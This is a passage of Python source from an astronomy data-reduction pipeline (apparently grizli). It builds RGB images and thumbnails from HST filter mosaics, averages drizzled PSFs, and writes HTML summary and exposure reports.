'y': ['f098m', 'f105w'],
'j': ['f110w', 'f125w'],
'h': ['f140w', 'f160w']}
for j in joined:
if j in use_filters:
indices = []
for f in use_filters:
if f in joined:
continue
if j in 'yjh':
if f in joined[j]:
indices.append(use_filters.index(f))
else:
if f[1] in joined[j]:
indices.append(use_filters.index(f))
if len(indices) == len(use_filters)-1:
# All filters are in a given group so pop the group
pop_indices.append(use_filters.index(j))
else:
pop_indices.extend(indices)
pop_indices.sort()
for i in pop_indices[::-1]:
filt_i = use_filters.pop(i)
for_sort.pop(filt_i)
# Only one filter
if len(use_filters) == 1:
f = use_filters[0]
return [f, f, f]
if len(filter_list) == 1:
f = filter_list[0]
return [f, f, f]
if (len(use_filters) == 0) & (len(filter_list) > 0):
so = np.argsort(filter_list)
f = filter_list[so[-1]]
return [f, f, f]
# Preference for red filters
if (len(ir_filters) >= 3) & (not pure_sort):
use_filters = ir_filters
for k in list(for_sort.keys()):
if k not in ir_filters:
p = for_sort.pop(k)
so = np.argsort(list(for_sort.values()))
waves = np.cast[float]([for_sort[f][1:] for f in for_sort])
# Reddest
rfilt = use_filters[so[-1]]
# Bluest
bfilt = use_filters[so[0]]
if len(use_filters) == 2:
return [rfilt, 'sum', bfilt]
elif len(use_filters) == 3:
gfilt = use_filters[so[1]]
return [rfilt, gfilt, bfilt]
else:
# Closest to average wavelength
mean = np.mean([waves.max(), waves.min()])
ix_g = np.argmin(np.abs(waves-mean))
gfilt = use_filters[ix_g]
return [rfilt, gfilt, bfilt]
TICKPARAMS = dict(axis='both', colors='w', which='both')
def field_rgb(root='j010514+021532', xsize=6, output_dpi=None, HOME_PATH='./', show_ir=True, pl=1, pf=1, scl=1, scale_ab=None, rgb_scl=[1, 1, 1], ds9=None, force_ir=False, filters=None, add_labels=True, output_format='jpg', rgb_min=-0.01, xyslice=None, pure_sort=False, verbose=True, force_rgb=None, suffix='.field', mask_empty=False, tick_interval=60, timestamp=False, mw_ebv=0, use_background=False, tickparams=TICKPARAMS, fill_black=False, ref_spectrum=None, gzext='', full_dimensions=False, invert=False, get_rgb_array=False, get_images=False):
"""
RGB image of the field mosaics
"""
import matplotlib.pyplot as plt
from matplotlib.ticker import MultipleLocator
#import montage_wrapper
from astropy.visualization import make_lupton_rgb
try:
from .. import utils
except:
from grizli import utils
if HOME_PATH is not None:
phot_file = '{0}/{1}/Prep/{1}_phot.fits'.format(HOME_PATH, root)
if not os.path.exists(phot_file):
print('Photometry file {0} not found.'.format(phot_file))
return False
phot = utils.GTable.gread(phot_file)
sci_files = glob.glob('{0}/{1}/Prep/{1}-[ofuvyjh]*sci.fits{2}'.format(HOME_PATH, root, gzext))
PATH_TO = '{0}/{1}/Prep'.format(HOME_PATH, root)
else:
PATH_TO = './'
sci_files = glob.glob('./{1}-[fuvyjho]*sci.fits{2}'.format(PATH_TO, root, gzext))
print('PATH: {0}, files:{1}'.format(PATH_TO, sci_files))
if filters is None:
filters = [file.split('_')[-3].split('-')[-1] for file in sci_files]
if show_ir:
filters += ['ir']
#mag_auto = 23.9-2.5*np.log10(phot['flux_auto'])
ims = {}
for f in filters:
try:
img = glob.glob('{0}/{1}-{2}_dr?_sci.fits{3}'.format(PATH_TO, root, f, gzext))[0]
except:
print('Failed: {0}/{1}-{2}_dr?_sci.fits{3}'.format(PATH_TO, root, f, gzext))
try:
ims[f] = pyfits.open(img)
if 'IMGMED' in ims[f][0].header:
imgmed = ims[f][0].header['IMGMED']
ims[f][0].data -= imgmed
else:
imgmed = 0
bkg_file = img.split('_dr')[0]+'_bkg.fits'
if use_background & os.path.exists(bkg_file):
print('Subtract background: '+bkg_file)
bkg = pyfits.open(bkg_file)
ims[f][0].data -= bkg[0].data - imgmed
except:
continue
filters = list(ims.keys())
wcs = pywcs.WCS(ims[filters[-1]][0].header)
pscale = utils.get_wcs_pscale(wcs)
minor = MultipleLocator(tick_interval/pscale)
if force_rgb is None:
rf, gf, bf = get_rgb_filters(filters, force_ir=force_ir, pure_sort=pure_sort)
else:
rf, gf, bf = force_rgb
logstr = '# field_rgb {0}: r {1} / g {2} / b {3}'.format(root, rf, gf, bf)
utils.log_comment(utils.LOGFILE, logstr, verbose=verbose)
#pf = 1
#pl = 1
if scale_ab is not None:
zp_r = utils.calc_header_zeropoint(ims[rf], ext=0)
scl = 10**(-0.4*(zp_r-5-scale_ab))
scl *= (0.06/pscale)**2
if mw_ebv > 0:
MW_F99 = utils.MW_F99(mw_ebv*utils.MW_RV, r_v=utils.MW_RV)
else:
MW_F99 = None
rimg = ims[rf][0].data * (ims[rf][0].header['PHOTFLAM']/5.e-20)**pf * (ims[rf][0].header['PHOTPLAM']/1.e4)**pl*scl*rgb_scl[0]
if MW_F99 is not None:
rmw = 10**(0.4*(MW_F99(np.array([ims[rf][0].header['PHOTPLAM']]))))[0]
print('MW_EBV={0:.3f}, {1}: {2:.2f}'.format(mw_ebv, rf, rmw))
rimg *= rmw
if bf == 'sum':
bimg = rimg
elif bf == rf:
bimg = rimg
else:
bimg = ims[bf][0].data * (ims[bf][0].header['PHOTFLAM']/5.e-20)**pf * (ims[bf][0].header['PHOTPLAM']/1.e4)**pl*scl*rgb_scl[2]
if MW_F99 is not None:
bmw = 10**(0.4*(MW_F99(np.array([ims[bf][0].header['PHOTPLAM']]))))[0]
print('MW_EBV={0:.3f}, {1}: {2:.2f}'.format(mw_ebv, bf, bmw))
bimg *= bmw
# Double-acs
if bimg.shape != rimg.shape:
import scipy.ndimage as nd
kern = np.ones((2, 2))
bimg = nd.convolve(bimg, kern)[::2, ::2]
if gf == 'sum':
gimg = (rimg+bimg)/2.
elif gf == rf:
gimg = rimg
elif gf == bf:
gimg = bimg
else:
gscl = (ims[gf][0].header['PHOTFLAM']/5.e-20)**pf
gscl *= (ims[gf][0].header['PHOTPLAM']/1.e4)**pl
gimg = ims[gf][0].data * gscl * scl * rgb_scl[1] # * 1.5
if MW_F99 is not None:
gmw = 10**(0.4*(MW_F99(np.array([ims[gf][0].header['PHOTPLAM']]))))[0]
print('MW_EBV={0:.3f}, {1}: {2:.2f}'.format(mw_ebv, gf, gmw))
gimg *= gmw
rmsk = rimg == 0
gmsk = gimg == 0
bmsk = bimg == 0
if gimg.shape != rimg.shape:
import scipy.ndimage as nd
kern = np.ones((2, 2))
gimg = nd.convolve(gimg, kern)[::2, ::2]
gmsk = gmsk[::2,::2]
# Scale by reference synphot spectrum
if ref_spectrum is not None:
import pysynphot as S
try:
_obsm = [utils.get_filter_obsmode(filter=_f) for _f in [rf, gf, bf]]
_bp = [S.ObsBandpass(_m) for _m in _obsm]
_bpf = [ref_spectrum.integrate_filter(_b)/_b.pivot()**2 for _b in _bp]
gimg *= _bpf[0]/_bpf[1]
bimg *= _bpf[0]/_bpf[2]
print('ref_spectrum supplied: {0}*{1:.2f} {2}*{3:.2f}'.format(gf, _bpf[0]/_bpf[1], bf, _bpf[0]/_bpf[2]))
except:
pass
if mask_empty:
mask = rmsk | gmsk | bmsk
print('Mask empty pixels in any channel: {0}'.format(mask.sum()))
rimg[mask] = 0
gimg[mask] = 0
bimg[mask] = 0
if ds9:
ds9.set('rgb')
ds9.set('rgb channel red')
wcs_header = utils.to_header(pywcs.WCS(ims[rf][0].header))
ds9.view(rimg, header=wcs_header)
ds9.set_defaults()
ds9.set('cmap value 9.75 0.8455')
ds9.set('rgb channel green')
ds9.view(gimg, wcs_header)
ds9.set_defaults()
ds9.set('cmap value 9.75 0.8455')
ds9.set('rgb channel blue')
ds9.view(bimg, wcs_header)
ds9.set_defaults()
ds9.set('cmap value 9.75 0.8455')
ds9.set('rgb channel red')
ds9.set('rgb lock colorbar')
return False
xsl = ysl = None
if show_ir & (not full_dimensions):
# Show only area where IR is available
yp, xp = np.indices(ims[rf][0].data.shape)
wht = pyfits.open(ims[rf].filename().replace('_sci', '_wht'))
mask = wht[0].data > 0
xsl = slice(xp[mask].min(), xp[mask].max())
ysl = slice(yp[mask].min(), yp[mask].max())
rimg = rimg[ysl, xsl]
bimg = bimg[ysl, xsl]
gimg = gimg[ysl, xsl]
if fill_black:
rmsk = rmsk[ysl, xsl]
gmsk = gmsk[ysl, xsl]
bmsk = bmsk[ysl, xsl]
else:
if xyslice is not None:
xsl, ysl = xyslice
rimg = rimg[ysl, xsl]
bimg = bimg[ysl, xsl]
gimg = gimg[ysl, xsl]
if fill_black:
rmsk = rmsk[ysl, xsl]
gmsk = gmsk[ysl, xsl]
bmsk = bmsk[ysl, xsl]
if get_images:
return (rimg, gimg, bimg), (rf, gf, bf)
image = make_lupton_rgb(rimg, gimg, bimg, stretch=0.1, minimum=rgb_min)
if invert:
image = 255-image
if fill_black:
image[rmsk,0] = 0
image[gmsk,1] = 0
image[bmsk,2] = 0
if get_rgb_array:
return image
sh = image.shape
ny, nx, _ = sh
if full_dimensions:
dpi = int(nx/xsize)
xsize = nx/dpi
#print('xsize: ', xsize, ny, nx, dpi)
elif (output_dpi is not None):
xsize = nx/output_dpi
dim = [xsize, xsize/nx*ny]
fig, ax = plt.subplots(1,1,figsize=dim)
ax.imshow(image, origin='lower', extent=(-nx/2, nx/2, -ny/2, ny/2))
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.xaxis.set_major_locator(minor)
ax.yaxis.set_major_locator(minor)
#ax.tick_params(axis='x', colors='w', which='both')
#ax.tick_params(axis='y', colors='w', which='both')
if tickparams:
ax.tick_params(**tickparams)
if add_labels:
ax.text(0.03, 0.97, root, bbox=dict(facecolor='w', alpha=0.8), size=10, ha='left', va='top', transform=ax.transAxes)
ax.text(0.06+0.08*2, 0.02, rf, color='r', bbox=dict(facecolor='w', alpha=1), size=8, ha='center', va='bottom', transform=ax.transAxes)
ax.text(0.06+0.08, 0.02, gf, color='g', bbox=dict(facecolor='w', alpha=1), size=8, ha='center', va='bottom', transform=ax.transAxes)
ax.text(0.06, 0.02, bf, color='b', bbox=dict(facecolor='w', alpha=1), size=8, ha='center', va='bottom', transform=ax.transAxes)
if timestamp:
fig.text(0.97, 0.03, time.ctime(), ha='right', va='bottom', fontsize=5, transform=fig.transFigure, color='w')
if full_dimensions:
ax.axis('off')
fig.tight_layout(pad=0)
dpi = int(nx/xsize/full_dimensions)
fig.savefig('{0}{1}.{2}'.format(root, suffix, output_format), dpi=dpi)
else:
fig.tight_layout(pad=0.1)
fig.savefig('{0}{1}.{2}'.format(root, suffix, output_format))
return xsl, ysl, (rf, gf, bf), fig
#########
THUMB_RGB_PARAMS = {'xsize': 4,
'output_dpi': None,
'rgb_min': -0.01,
'add_labels': False,
'output_format': 'png',
'show_ir': False,
'scl': 2,
'suffix': '.rgb',
'mask_empty': False,
'tick_interval': 1,
'pl': 1, # 1 for f_lambda, 2 for f_nu
}
DRIZZLER_ARGS = {'aws_bucket': False,
'scale_ab': 21.5,
'subtract_median': False,
'theta': 0.,
'pixscale': 0.1,
'pixfrac': 0.33,
'kernel': 'square',
'half_optical_pixscale': True,
'filters': ['f160w', 'f814w', 'f140w', 'f125w', 'f105w',
'f110w', 'f098m', 'f850lp', 'f775w', 'f606w',
'f475w', 'f555w', 'f600lp', 'f390w', 'f350lp'],
'size': 3,
'thumb_height': 1.5,
'rgb_params': THUMB_RGB_PARAMS,
'remove': False,
'include_ir_psf': True,
'combine_similar_filters': False,
'single_output': True}
def make_rgb_thumbnails(root='j140814+565638', ids=None, maglim=21,
drizzler_args=DRIZZLER_ARGS, use_line_wcs=False,
remove_fits=False, skip=True, min_filters=2,
auto_size=False, size_limits=[4, 15], mag=None,
make_segmentation_figure=True):
"""
Make RGB thumbnails in working directory
"""
import matplotlib.pyplot as plt
import astropy.wcs as pywcs
from grizli.aws import aws_drizzler
phot_cat = glob.glob('../Prep/{0}_phot.fits'.format(root))[0]
cat = utils.read_catalog(phot_cat)
if make_segmentation_figure:
plt.ioff()
seg_files = glob.glob('../*/{0}*seg.fits*'.format(root))
if len(seg_files) == 0:
make_segmentation_figure = False
else:
seg = pyfits.open(seg_files[0])
seg_data = seg[0].data
seg_wcs = pywcs.WCS(seg[0].header)
# Randomize seg to get dispersion between neighboring objects
np.random.seed(hash(root) % (10 ** 8))
rnd_ids = np.append([0], np.argsort(np.random.rand(len(cat)))+1)
#rnd_seg = rnd_ids[seg[0].data]
#phot_xy = seg_wcs.all_world2pix(cat['ra'], cat['dec'], 0)
# Count filters
num_filters = 0
for k in cat.meta:
if k.startswith('F') & k.endswith('uJy2dn'):
num_filters += 1
if min_filters > num_filters:
print('# make_rgb_thumbnails: only {0} filters found'.format(num_filters))
return False
if mag is None:
auto_mag = 23.9-2.5*np.log10(cat['flux_auto']*cat['tot_corr'])
# More like surface brightness
try:
mag = 23.9-2.5*np.log10(cat['flux_aper_2'])
mag[~np.isfinite(mag)] = auto_mag[~np.isfinite(mag)]
except:
mag = auto_mag
pixel_scale = cat.meta['ASEC_0']/cat.meta['APER_0']
sx = (cat['xmax']-cat['xmin'])*pixel_scale
sy = (cat['ymax']-cat['ymin'])*pixel_scale
#lim_mag = 23.9-2.5*np.log10(200*np.percentile(cat['fluxerr_aper_4'], 50))
#print('limiting mag: ', lim_mag)
lim_mag = 22.8
extracted_ids = False
if ids is None:
ids = cat['id'][mag < maglim]
elif ids == 'extracted':
extracted_ids = True
# Make thumbnails for extracted objects
beams_files = glob.glob('../Extractions/*beams.fits')
if len(beams_files) == 0:
return False
beams_files.sort()
ids = [int(os.path.basename(file).split('_')[-1].split('.beams')[0]) for file in beams_files]
for id_column in ['id', 'number']:
if id_column in cat.colnames:
break
args = drizzler_args.copy()
N = len(ids)
for i, id in enumerate(ids):
ix = cat[id_column] == id
label = '{0}_{1:05d}'.format(root, id)
thumb_files = glob.glob('../*/{0}.thumb.png'.format(label))
if (skip) & (len(thumb_files) > 0):
print('\n##\n## RGB thumbnail {0} ({1}/{2})\n##'.format(label, i+1, N))
continue
args['scale_ab'] = np.clip(mag[ix][0]-1, 17, lim_mag)
# Use drizzled line image for WCS?
if use_line_wcs:
line_file = glob.glob('../Extractions/{0}.full.fits'.format(label))
# Reset
if 'wcs' in args:
args.pop('wcs')
for k in ['pixfrac', 'kernel']:
if k in drizzler_args:
args[k] = drizzler_args[k]
# Find line extrension
msg = '\n# Use WCS from {0}[{1},{2}] (pixfrac={3:.2f}, kernel={4})'
if len(line_file) > 0:
full = pyfits.open(line_file[0])
for ext in full:
if 'EXTNAME' in ext.header:
if ext.header['EXTNAME'] == 'LINE':
try:
wcs = pywcs.WCS(ext.header)
args['wcs'] = wcs
args['pixfrac'] = ext.header['PIXFRAC']
args['kernel'] = ext.header['DRIZKRNL']
print(msg.format(line_file[0],
ext.header['EXTNAME'],
ext.header['EXTVER'], args['pixfrac'],
args['kernel']))
except:
pass
break
if (auto_size) & ('wcs' not in args):
s_i = np.maximum(sx[ix][0], sy[ix][0])
args['size'] = np.ceil(np.clip(s_i,
size_limits[0], size_limits[1]))
print('\n##\n## RGB thumbnail {0} *size={3}* ({1}/{2})\n##'.format(label, i+1, N, args['size']))
else:
print('\n##\n## RGB thumbnail {0} ({1}/{2})\n##'.format(label, i+1, N))
aws_drizzler.drizzle_images(label=label,
ra=cat['ra'][ix][0], dec=cat['dec'][ix][0],
master='local', single_output=True,
make_segmentation_figure=False, **args)
files = glob.glob('{0}.thumb.fits'.format(label))
blot_seg = None
if (make_segmentation_figure) & (len(files) > 0):
th = pyfits.open(files[0], mode='update')
th_wcs = pywcs.WCS(th[0].header)
blot_seg = utils.blot_nearest_exact(seg_data, seg_wcs, th_wcs,
stepsize=-1, scale_by_pixel_area=False)
rnd_seg = rnd_ids[np.cast[int](blot_seg)]*1.
th_ids = np.unique(blot_seg)
sh = th[0].data.shape
yp, xp = np.indices(sh)
thumb_height = 2.
fig = plt.figure(figsize=[thumb_height*sh[1]/sh[0], thumb_height])
ax = fig.add_subplot(111)
rnd_seg[rnd_seg == 0] = np.nan
ax.imshow(rnd_seg, aspect='equal', cmap='terrain_r',
vmin=-0.05*len(cat), vmax=1.05*len(cat))
ax.set_xticklabels([])
ax.set_yticklabels([])
ix = utils.column_values_in_list(cat['number'], th_ids)
xc, yc = th_wcs.all_world2pix(cat['ra'][ix], cat['dec'][ix], 0)
xc = np.clip(xc, 0.09*sh[1], 0.91*sh[1])
yc = np.clip(yc, 0.08*sh[0], 0.92*sh[0])
for th_id, x_i, y_i in zip(cat['number'][ix], xc, yc):
if th_id == 0:
continue
ax.text(x_i, y_i, '{0:.0f}'.format(th_id), ha='center', va='center', fontsize=8, color='w')
ax.text(x_i, y_i, '{0:.0f}'.format(th_id), ha='center', va='center', fontsize=8, color='k', alpha=0.95)
ax.set_xlim(0, sh[1]-1)
ax.set_ylim(0, sh[0]-1)
ax.set_axis_off()
fig.tight_layout(pad=0.01)
fig.savefig('{0}.seg.png'.format(label))
plt.close(fig)
# Append to thumbs file
seg_hdu = pyfits.ImageHDU(data=np.cast[int](blot_seg), name='SEG')
th.append(seg_hdu)
th.writeto('{0}.thumb.fits'.format(label), overwrite=True,
output_verify='fix')
th.close()
if remove_fits > 0:
files = glob.glob('{0}*_dr[cz]*fits'.format(label))
for file in files:
os.remove(file)
def field_psf(root='j020924-044344', PREP_PATH='../Prep', RAW_PATH='../RAW', EXTRACT_PATH='../Extractions', factors=[1, 2, 4], get_drizzle_scale=True, subsample=256, size=6, get_line_maps=False, raise_fault=False, verbose=True, psf_filters=['F098M', 'F110W', 'F105W', 'F125W', 'F140W', 'F160W'], skip=False, make_fits=True, **kwargs):
"""
Generate PSFs for the available filters in a given field
"""
import os
import glob
import astropy.wcs as pywcs
import astropy.io.fits as pyfits
try:
from .. import utils
from ..galfit import psf as gpsf
except:
from grizli import utils
from grizli.galfit import psf as gpsf
os.chdir(PREP_PATH)
drz_str = '{0}-ir_dr?_sci.fits'.format(root)
drz_file = glob.glob(drz_str)
if len(drz_file) == 0:
err = f'Reference file {drz_str} not found.'
if raise_fault:
raise FileNotFoundError(err)
else:
print(err)
return False
else:
drz_file = drz_file[0]
scale = []
pixfrac = []
kernel = []
labels = []
# For the line maps
if get_line_maps:
args_file = os.path.join(EXTRACT_PATH, f'{root}_fit_args.npy')
if not os.path.exists(args_file):
err = 'fit_args.npy not found.'
if raise_fault:
raise FileNotFoundError(err)
else:
print(err)
return False
default = DITHERED_PLINE
# Parameters of the line maps
args = np.load(args_file, allow_pickle=True)[0]
# Line images
pline = args['pline']
for factor in factors:
if 'pixscale' in pline:
scale.append(pline['pixscale']/factor)
else:
scale.append(default['pixscale']/factor)
if 'pixfrac' in pline:
pixfrac.append(pline['pixfrac'])
else:
pixfrac.append(default['pixfrac'])
if 'kernel' in pline:
kernel.append(pline['kernel'])
else:
kernel.append(default['kernel'])
labels.append('LINE{0}'.format(factor))
# Mosaic
im = pyfits.open(drz_file)
drz_wcs = pywcs.WCS(im[0].header)
pscale = utils.get_wcs_pscale(drz_wcs)
sh = im[0].data.shape
if get_drizzle_scale:
rounded = int(np.round(im[0].header['D001SCAL']*1000))/1000.
for factor in factors:
scale.append(rounded/factor)
labels.append('DRIZ{0}'.format(factor))
kernel.append(im[0].header['D001KERN'])
pixfrac.append(im[0].header['D001PIXF'])
# FITS info
visits_file = '{0}_visits.npy'.format(root)
if not os.path.exists(visits_file):
parse_visits(field_root=root, RAW_PATH=RAW_PATH)
visits, groups, info = np.load(visits_file, allow_pickle=True)
# Append "U" to UVIS filters in info
if 'DETECTOR' in info.colnames:
uvis = np.where(info['DETECTOR'] == 'UVIS')[0]
filters = [f for f in info['FILTER']]
for i in uvis:
filters[i] += 'U'
info['FILTER'] = filters
# Average PSF
xp, yp = np.meshgrid(np.arange(0, sh[1], subsample),
np.arange(0, sh[0], subsample))
ra, dec = drz_wcs.all_pix2world(xp, yp, 0)
# Ref images
files = glob.glob('{0}-f[0-9]*sci.fits'.format(root))
if verbose:
print(' ')
hdus = []
for file in files:
filter = file.split(root+'-')[1].split('_')[0]
if filter.upper() not in psf_filters:
continue
if (os.path.exists('{0}-{1}_psf.fits'.format(root, filter))) & skip:
continue
flt_files = list(info['FILE'][info['FILTER'] == filter.upper()])
if len(flt_files) == 0:
# Try to use HDRTAB in drizzled image
flt_files = None
driz_image = file
else:
driz_image = drz_file
driz_hdu = pyfits.open(file)
GP = gpsf.DrizzlePSF(flt_files=flt_files, info=None,
driz_image=driz_image)
hdu = pyfits.HDUList([pyfits.PrimaryHDU()])
hdu[0].header['ROOT'] = root
for scl, pf, kern_i, label in zip(scale, pixfrac, kernel, labels):
ix = 0
psf_f = None
if pf == 0:
kern = 'point'
else:
kern = kern_i
logstr = '# psf {0} {5:6} / {1:.3f}" / pixf: {2} / {3:8} / {4}'
logstr = logstr.format(root, scl, pf, kern, filter, label)
utils.log_comment(utils.LOGFILE, logstr, verbose=verbose)
for ri, di in zip(ra.flatten(), dec.flatten()):
slice_h, wcs_slice = utils.make_wcsheader(ra=ri, dec=di,
size=size, pixscale=scl,
get_hdu=False, theta=0)
# Filters with extended profiles
irext = ['F098M', 'F110W', 'F105W', 'F125W', 'F140W', 'F160W']
get_extended = filter.upper() in irext
try:
psf_i = GP.get_psf(ra=ri, dec=di, filter=filter.upper(),
pixfrac=pf, kernel=kern, verbose=False,
wcs_slice=wcs_slice,
get_extended=get_extended,
get_weight=True)
except:
continue
msk_i = (psf_i[1].data != 0)
msk_i &= np.isfinite(psf_i[1].data)
if msk_i.sum() == 0:
continue
if ix == 0:
# Initialize
msk_f = msk_i*1
psf_f = psf_i
psf_f[1].data[msk_f == 0] = 0
ix += 1
else:
# Add to existing
msk_f += msk_i*1
psf_f[1].data[msk_i > 0] += psf_i[1].data[msk_i > 0]
ix += 1
if psf_f is None:
msg = 'PSF for {0} (filter={1}) is empty'
print(msg.format(file, filter))
continue
# Average
psf_f[1].data /= np.maximum(msk_f, 1)
psf_f[1].header['FILTER'] = filter, 'Filter'
psf_f[1].header['PSCALE'] = scl, 'Pixel scale, arcsec'
psf_f[1].header['PIXFRAC'] = pf, 'Pixfrac'
psf_f[1].header['KERNEL'] = kern, 'Kernel'
psf_f[1].header['EXTNAME'] = 'PSF'
psf_f[1].header['EXTVER'] = label
hdu.append(psf_f[1])
if make_fits:
psf_file = '{0}-{1}_psf.fits'.format(root, filter)
hdu.writeto(psf_file, overwrite=True)
hdus.append(hdu)
return hdus
def make_report(root, gzipped_links=True, xsize=18, output_dpi=None, make_rgb=True, mw_ebv=0):
"""
Make HTML report of the imaging and grism data products
"""
import glob
import matplotlib.pyplot as plt
import astropy.time
now = astropy.time.Time.now().iso
plt.ioff()
os.chdir('../Prep/')
bfilters = glob.glob('{0}-f[2-8]*sci.fits'.format(root))
bfilters.sort()
rfilters = glob.glob('{0}-f[01]*sci.fits'.format(root))
rfilters.sort()
filters = [f.split('-')[-1].split('_dr')[0] for f in bfilters + rfilters]
if len(filters) == 0:
has_mosaics = False
visits, groups, info = np.load('{0}_visits.npy'.format(root),
allow_pickle=True)
filters = np.unique([v['product'].split('-')[-1] for v in visits])
else:
has_mosaics = True
if make_rgb & has_mosaics:
field_rgb(root, HOME_PATH=None, xsize=xsize, output_dpi=output_dpi, ds9=None, scl=2, suffix='.rgb', timestamp=True, mw_ebv=mw_ebv)
for filter in filters:
field_rgb(root, HOME_PATH=None, xsize=18, ds9=None, scl=2, force_rgb=[filter, 'sum', 'sum'], suffix='.'+filter, timestamp=True)
##
## Mosaic table
##
rows = []
line = 'grep -e " 0 " -e "radec" *{0}*wcs.log > /tmp/{1}.log'
for filter in filters:
os.system(line.format(filter.strip('u'), root))
wcs_files = glob.glob('*{0}*wcs.log'.format(filter))
wcs = '<pre>'+''.join(open('/tmp/{0}.log'.format(root)).readlines())+'</pre>'
for file in wcs_files:
png_url = '<a href={1}>{0}</a>'.format(file, file.replace('.log', '.png').replace('+', '%2B'))
wcs = wcs.replace(file, png_url)
try:
im = pyfits.open(glob.glob('{0}-{1}*sci.fits'.format(root, filter))[0])
h = im[0].header
url = '<a href="./{0}">sci</a>'.format(im.filename())
url += ' '+url.replace('_sci', '_wht').replace('>sci', '>wht')
if gzipped_links:
url = url.replace('.fits', '.fits.gz')
psf_file = '{0}-{1}_psf.fits'.format(root, filter)
if os.path.exists(psf_file):
url += ' '+'<a href="./{0}">psf</a>'.format(psf_file)
row = [filter, url, '{0} {1}'.format(h['NAXIS1'], h['NAXIS2']), '{0:.5f} {1:.5f}'.format(h['CRVAL1'], h['CRVAL2']), h['EXPTIME'], h['NDRIZIM'], wcs, '<a href={0}.{1}.jpg><img src={0}.{1}.jpg height=200px></a>'.format(root, filter)]
except:
row = [filter, '--', '--', '--', 0., 0, wcs, '--']
rows.append(row)
tab = utils.GTable(rows=rows, names=['filter', 'FITS', 'naxis', 'crval', 'exptime', 'ndrizim', 'wcs_log', 'img'], dtype=[str, str, str, str, float, int, str, str])
tab['exptime'].format = '.1f'
tab.write_sortable_html('{0}.summary.html'.format(root), replace_braces=True, localhost=False, max_lines=500, table_id=None, table_class='display compact', css=None, filter_columns=[], buttons=['csv'], toggle=False, use_json=False)
## Grism figures
column_files = glob.glob('*column.png')
if len(column_files) > 0:
column_files.sort()
column_url = '<div>' + ' '.join(['<a href="./{0}"><img src="./{0}" height=100px title="{1}"></a>'.format(f.replace('+', '%2B'), f) for f in column_files]) + '</div>'
else:
column_url = ''
grism_files = glob.glob('../Extractions/*grism*fits*')
if len(grism_files) > 0:
grism_files.sort()
grism_pngs = glob.glob('../Extractions/*grism*png')
if len(grism_pngs) > 0:
grism_pngs.sort()
grism_url = '<div>' + ' '.join(['<a href="./{0}"><img src="./{0}" width=400px title="{1}"></a>'.format(f.replace('+', '%2B'), f) for f in grism_pngs]) + '</div>\n'
else:
grism_url = ''
grism_url += '<pre>'
grism_url += '\n'.join(['<a href="./{0}">{1}</a>'.format(f.replace('+', '%2B'), f) for f in grism_files])
grism_url += '\n <a href=../Extractions/{0}-fit.html> {0}-fit.html </a>'.format(root)
grism_url += '\n <a href="../Extractions/{0}_zhist.png"><img src="../Extractions/{0}_zhist.png" width=400px title="{0}_zhist.png"> </a>'.format(root)
grism_url += '\n</pre>'
if gzipped_links:
grism_url = grism_url.replace('.fits', '.fits.gz')
else:
grism_url = ''
try:
catalog = glob.glob('{0}-*.cat.fits'.format(root))[0]
except:
catalog = 'xxx'
catroot = catalog.split('.cat.fits')[0]
root_files = glob.glob('{0}-[ioyh]*fits*'.format(root))
root_files.sort()
if gzipped_links:
gzext = '.gz'
else:
gzext = ''
root_urls = '\n '.join(['<a href={0}{1}>{0}{1}</a>'.format(f, gzext) for f in root_files])
body = """
<h4>{root} </h4>
{now}<br>
<a href={root}.exposures.html>Exposure report</a>
/ <a href={root}_expflag.txt>{root}_expflag.txt</a>
/ <a href={root}.auto_script.log.txt>{root}.auto_script.log.txt</a>
/ <a href={root}.auto_script.yml>{root}.auto_script.yml</a>
<pre>
{root_urls}
<a href="{root}_visits.npy">{root}_visits.npy</a>
</pre>
{column}
{grism}
<a href="./{root}.rgb.jpg"><img src="./{root}.rgb.jpg" height=300px></a>
<a href="https://s3.amazonaws.com/grizli-v1/Master/{root}_footprint.png"><img src="https://s3.amazonaws.com/grizli-v1/Master/{root}_footprint.png" height=300px></a>
<a href="./{root}_fine.png"><img src="./{root}_fine.png" height=200px></a>
<br>
""".format(root=root, column=column_url, grism=grism_url, gz='.gz'*(gzipped_links), now=now, catroot=catroot, root_urls=root_urls)
lines = open('{0}.summary.html'.format(root)).readlines()
for i in range(len(lines)):
if '<body>' in lines[i]:
break
lines.insert(i+1, body)
fp = open('{0}.summary.html'.format(root), 'w')
fp.writelines(lines)
fp.close()
def exposure_report(root, log=True):
"""
Save exposure info to webpage & json file
"""
if log:
frame = inspect.currentframe()
utils.log_function_arguments(utils.LOGFILE, frame,
'auto_script.exposure_report')
from collections import OrderedDict
import json
# Exposures
visits, all_groups, info = np.load('{0}_visits.npy'.format(root),
allow_pickle=True)
tab = utils.GTable(info)
tab.add_index('FILE')
visit_product = ['']*len(info)
ramp = ['']*len(info)
trails = ['']*len(info)
persnpix = [-1]*len(info)
tab['complete'] = False
flt_dict = OrderedDict()
for visit in visits:
failed = len(glob.glob('{0}*fail*'.format(visit['product']))) > 0
for file in visit['files']:
ix = tab.loc_indices[file]
if os.path.exists(file):
fobj = pyfits.open(file)
fd = utils.flt_to_dict(fobj)
fd['complete'] = not failed
flt_dict[file] = fd
flt_dict['visit'] = visit['product']
if 'PERSNPIX' in fobj[0].header:
persnpix[ix] = fobj[0].header['PERSNPIX']
visit_product[ix] = visit['product']
tab['complete'][ix] = not failed
base = file.split('_')[0]
ramp_file = '../RAW/{0}_ramp.png'.format(base)
has_mask = glob.glob('{0}*mask.reg'.format(base))
if has_mask:
extra = ' style="border:5px solid red;"'
else:
extra = ''
if os.path.exists(ramp_file):
ramp[ix] = '<a href="{0}"><img src="{0}" height=180 {1}></a>'.format(ramp_file, extra)
trails_file = '../RAW/{0}_trails.png'.format(base)
if os.path.exists(trails_file):
trails[ix] = '<a href="{0}"><img src="{0}" height=180 {1}></a>'.format(trails_file, extra)
tab['persnpix'] = persnpix
tab['product'] = visit_product
tab['ramp'] = ramp
tab['trails'] = trails
tab['EXPSTART'].format = '.3f'
tab['EXPTIME'].format = '.1f'
tab['PA_V3'].format = '.1f'
tab['RA_TARG'].format = '.6f'
tab['DEC_TARG'].format = '.6f'
# Turn fileinto a URL
file_urls = ['<a href="./{0}">{0}</a>'.format(f) for f in tab['FILE']]
tab['FLT'] = file_urls
cols = ['FLT']+tab.colnames[1:-1]
fp = open('{0}_exposures.json'.format(root), 'w')
json.dump(flt_dict, fp)
fp.close()
